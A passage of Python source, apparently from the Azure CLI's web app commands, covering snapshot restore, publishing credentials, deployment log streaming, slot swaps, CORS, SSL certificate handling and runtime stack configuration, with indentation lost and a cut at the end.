if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
for host in app.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
if not isinstance(profiles, list):
profiles = [profiles]
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = level if application_logging != 'off' else False
level = True if level is None else level
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
# Default isPreserveVnet to 'True' if preserve_vnet is 'None'
isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
# converstion from string to Boolean
isPreserveVnet = bool(isPreserveVnet == 'true')
CsmSlotEntity = cmd.get_models('CsmSlotEntity')
slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=isPreserveVnet)
if action == 'swap':
poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
return poller
if action == 'preview':
if slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = get_pool_manager(url)
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
logger.warning(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace')
.rstrip('\n\r')) # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
# If in the public cloud, check if certificate is an app service certificate, in the same or a diferent
# subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cmd.cli_ctx)
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
kv_secret_name = None
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
# if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except Exception as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
found_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
# delimiters allowed: '|', ':'
if '|' in runtime:
runtime = re.split('[|]', runtime)
elif ':' in runtime:
runtime = re.split('[:]', runtime)
else:
runtime = [runtime]
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack['configs'].items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
for r in result:
r['setter'] = _StackRuntimeHelper.update_site_config
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
